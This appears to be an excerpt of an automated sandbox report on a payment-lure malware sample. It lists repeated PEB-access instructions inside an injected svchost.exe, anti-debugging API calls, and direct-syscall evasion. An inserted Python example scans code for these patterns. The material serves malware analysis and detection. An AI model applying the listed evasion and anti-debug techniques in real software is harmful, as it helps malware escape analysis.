            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B364AB mov eax, dword ptr fs:[00000030h]2_2_03B364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEA49A mov eax, dword ptr fs:[00000030h]2_2_03BEA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B304E5 mov ecx, dword ptr fs:[00000030h]2_2_03B304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A430 mov eax, dword ptr fs:[00000030h]2_2_03B6A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]2_2_03B2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]2_2_03B2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]2_2_03B2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2C427 mov eax, dword ptr fs:[00000030h]2_2_03B2C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]2_2_03BB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]2_2_03B68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]2_2_03B68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]2_2_03B68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]2_2_03B5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]2_2_03B5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]2_2_03B5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC460 mov ecx, dword ptr fs:[00000030h]2_2_03BBC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEA456 mov eax, dword ptr fs:[00000030h]2_2_03BEA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2645D mov eax, dword ptr fs:[00000030h]2_2_03B2645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5245A mov eax, dword ptr fs:[00000030h]2_2_03B5245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]2_2_03B6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40BBE mov eax, dword ptr fs:[00000030h]2_2_03B40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40BBE mov eax, dword ptr fs:[00000030h]2_2_03B40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03BE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]2_2_03BE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]2_2_03B38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]2_2_03B38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]2_2_03B38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5EBFC mov eax, dword ptr fs:[00000030h]2_2_03B5EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBCBF0 mov eax, dword ptr fs:[00000030h]2_2_03BBCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDEBD0 mov eax, dword ptr fs:[00000030h]2_2_03BDEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]2_2_03B50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]2_2_03B50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]2_2_03B50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]2_2_03B30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]2_2_03B30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]2_2_03B30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5EB20 mov eax, dword ptr fs:[00000030h]2_2_03B5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5EB20 mov eax, dword ptr fs:[00000030h]2_2_03B5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF8B28 mov eax, dword ptr fs:[00000030h]2_2_03BF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF8B28 mov eax, dword ptr fs:[00000030h]2_2_03BF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C02B57 mov eax, dword ptr fs:[00000030h]2_2_03C02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C02B57 mov eax, dword ptr fs:[00000030h]2_2_03C02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C02B57 mov eax, dword ptr fs:[00000030h]2_2_03C02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C02B57 mov eax, dword ptr fs:[00000030h]2_2_03C02B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]2_2_03BAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04B00 mov eax, dword ptr fs:[00000030h]2_2_03C04B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2CB7E mov eax, dword ptr fs:[00000030h]2_2_03B2CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B28B50 mov eax, dword ptr fs:[00000030h]2_2_03B28B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDEB50 mov eax, dword ptr fs:[00000030h]2_2_03BDEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE4B4B mov eax, dword ptr fs:[00000030h]2_2_03BE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE4B4B mov eax, dword ptr fs:[00000030h]2_2_03BE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6B40 mov eax, dword ptr fs:[00000030h]2_2_03BC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6B40 mov eax, dword ptr fs:[00000030h]2_2_03BC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFAB40 mov eax, dword ptr fs:[00000030h]2_2_03BFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD8B42 mov eax, dword ptr fs:[00000030h]2_2_03BD8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38AA0 mov eax, dword ptr fs:[00000030h]2_2_03B38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B38AA0 mov eax, dword ptr fs:[00000030h]2_2_03B38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B86AA4 mov eax, dword ptr fs:[00000030h]2_2_03B86AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B68A90 mov edx, dword ptr fs:[00000030h]2_2_03B68A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]2_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04A80 mov eax, dword ptr fs:[00000030h]2_2_03C04A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6AAEE mov eax, dword ptr fs:[00000030h]2_2_03B6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6AAEE mov eax, dword ptr fs:[00000030h]2_2_03B6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30AD0 mov eax, dword ptr fs:[00000030h]2_2_03B30AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B64AD0 mov eax, dword ptr fs:[00000030h]2_2_03B64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B64AD0 mov eax, dword ptr fs:[00000030h]2_2_03B64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]2_2_03B86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]2_2_03B86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]2_2_03B86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B54A35 mov eax, dword ptr fs:[00000030h]2_2_03B54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B54A35 mov eax, dword ptr fs:[00000030h]2_2_03B54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA38 mov eax, dword ptr fs:[00000030h]2_2_03B6CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA24 mov eax, dword ptr fs:[00000030h]2_2_03B6CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5EA2E mov eax, dword ptr fs:[00000030h]2_2_03B5EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBCA11 mov eax, dword ptr fs:[00000030h]2_2_03BBCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BACA72 mov eax, dword ptr fs:[00000030h]2_2_03BACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BACA72 mov eax, dword ptr fs:[00000030h]2_2_03BACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]2_2_03B6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]2_2_03B6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]2_2_03B6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDEA60 mov eax, dword ptr fs:[00000030h]2_2_03BDEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]2_2_03B36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40A5B mov eax, dword ptr fs:[00000030h]2_2_03B40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40A5B mov eax, dword ptr fs:[00000030h]2_2_03B40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB89B3 mov esi, dword ptr fs:[00000030h]2_2_03BB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB89B3 mov eax, dword ptr fs:[00000030h]2_2_03BB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB89B3 mov eax, dword ptr fs:[00000030h]2_2_03BB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]2_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B309AD mov eax, dword ptr fs:[00000030h]2_2_03B309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B309AD mov eax, dword ptr fs:[00000030h]2_2_03B309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B629F9 mov eax, dword ptr fs:[00000030h]2_2_03B629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B629F9 mov eax, dword ptr fs:[00000030h]2_2_03B629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE9E0 mov eax, dword ptr fs:[00000030h]2_2_03BBE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03B3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B649D0 mov eax, dword ptr fs:[00000030h]2_2_03B649D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFA9D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC69C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C04940 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB892A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BC892B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BBC912 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B28918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B28918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BAE908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BAE908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BD4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BBC97C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B7096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B7096E mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B7096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BB0946 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C008C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BBC89D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B30887 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03BFA8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B5E8C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DD0AA6 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00DA25B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00D907BF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00D90955 SetUnhandledExceptionFilter,
            Source: C:\Users\user\Desktop\PAGO $830.900.exe | Code function: 0_2_00D90BA1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
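The fs:[00000030h] reads listed above are loads of the PEB pointer, the first step of the classic BeingDebugged / NtGlobalFlag checks and of import-free API resolution through PEB.Ldr. As an added example (it is not part of this report and not code from the sample), the following Python scans a 32-bit code buffer for that instruction pattern and labels the PEB field read next; the opcode tables and the sample byte blob are constructed for the demonstration.

```python
"""Linear scan of 32-bit x86 code for FS-relative PEB reads.

Added example, not part of the Joe Sandbox report. In a 32-bit (or WoW64)
process fs:[0x30] holds the PEB pointer; code that loads it is usually about
to test PEB.BeingDebugged (+0x02) or PEB.NtGlobalFlag (+0x68), or to walk
PEB.Ldr (+0x0C) to resolve APIs without an import table. All constants and the
sample bytes below are constructed for the demo.
"""
import re

# modrm "00 reg 101" (disp32, no base register) -> destination register,
# for the generic "8B /r" encoding of mov r32, fs:[disp32].
MODRM_DISP32 = {
    0x05: "eax", 0x0D: "ecx", 0x15: "edx", 0x1D: "ebx",
    0x25: "esp", 0x2D: "ebp", 0x35: "esi", 0x3D: "edi",
}

# 64 A1 30 00 00 00         mov eax, fs:[0x30]   (moffs32 short form, eax only)
# 64 8B <modrm> 30 00 00 00 mov r32, fs:[0x30]   (generic form, any r32)
PEB_READ = re.compile(
    rb"\x64(?:\xA1|\x8B(?P<modrm>[\x05\x0D\x15\x1D\x25\x2D\x35\x3D]))\x30\x00\x00\x00"
)

# What typically follows once the PEB pointer sits in eax: [eax+disp8] loads.
FOLLOW_UPS = {
    b"\x8A\x40\x02": "PEB.BeingDebugged (mov al, [eax+2])",
    b"\x0F\xB6\x40\x02": "PEB.BeingDebugged (movzx eax, byte [eax+2])",
    b"\x8B\x40\x68": "PEB.NtGlobalFlag (mov eax, [eax+0x68])",
    b"\x8B\x40\x0C": "PEB.Ldr (mov eax, [eax+0xC]); loader-list walk",
}


def find_peb_reads(code: bytes, base: int = 0) -> list[tuple[int, str, str]]:
    """Return (virtual address, destination register, follow-up note) per hit.

    This is a byte-pattern scan, not a disassembly: like a YARA rule it can
    fire on bytes that straddle two real instructions, so hits are candidates
    to confirm in a disassembler, not proof.
    """
    hits = []
    for m in PEB_READ.finditer(code):
        modrm = m.group("modrm")
        reg = MODRM_DISP32[modrm[0]] if modrm else "eax"
        note = ""
        if reg == "eax":
            tail = code[m.end():m.end() + 4]
            for pattern, meaning in FOLLOW_UPS.items():
                if tail.startswith(pattern):
                    note = meaning
                    break
        hits.append((base + m.start(), reg, note))
    return hits


# Constructed 32-bit fragment: a BeingDebugged test, a second PEB load into
# edx, then an NtGlobalFlag read. These are not bytes from the sample.
SAMPLE_CODE = (
    b"\x55\x8B\xEC"                  # push ebp ; mov ebp, esp
    b"\x64\xA1\x30\x00\x00\x00"      # mov eax, fs:[0x30]
    b"\x0F\xB6\x40\x02"              # movzx eax, byte [eax+2]  (BeingDebugged)
    b"\x85\xC0\x75\x05"              # test eax, eax ; jnz +5
    b"\x64\x8B\x15\x30\x00\x00\x00"  # mov edx, fs:[0x30]
    b"\x64\xA1\x30\x00\x00\x00"      # mov eax, fs:[0x30]
    b"\x8B\x40\x68"                  # mov eax, [eax+0x68]      (NtGlobalFlag)
    b"\x5D\xC3"                      # pop ebp ; ret
)


def main() -> None:
    # Print in the same shape as the report's "Code function" lines.
    for addr, reg, note in find_peb_reads(SAMPLE_CODE, base=0x00D90000):
        print(f"Code function: {addr:08X} mov {reg}, dword ptr fs:[00000030h]  {note}")


if __name__ == "__main__":
    main()
```

The report's hits are in svchost.exe after the sample has been mapped into it, so run a scan like this over the unpacked memory dump (the 2.2.svchost.exe.400000.0.unpack file the Yara matches refer to), not over the AutoIt loader on disk.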

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | NtAllocateVirtualMemory: Direct from: 0x76EF48EC
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | NtQueryAttributesFile: Direct from: 0x76EF2E6C
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | NtQuerySystemInformation: Direct from: 0x76EF48CC
            Source: C:\Program Files (x86)\pRKlnvUWYcZYjVIrACHEnSgoOVwurPRYmtWrvKZKjxTIvcrRdEoKmo\XXOIkqUXwzoOEy.exe | NtOpenSection: Direct from: 0x76EF2E0C
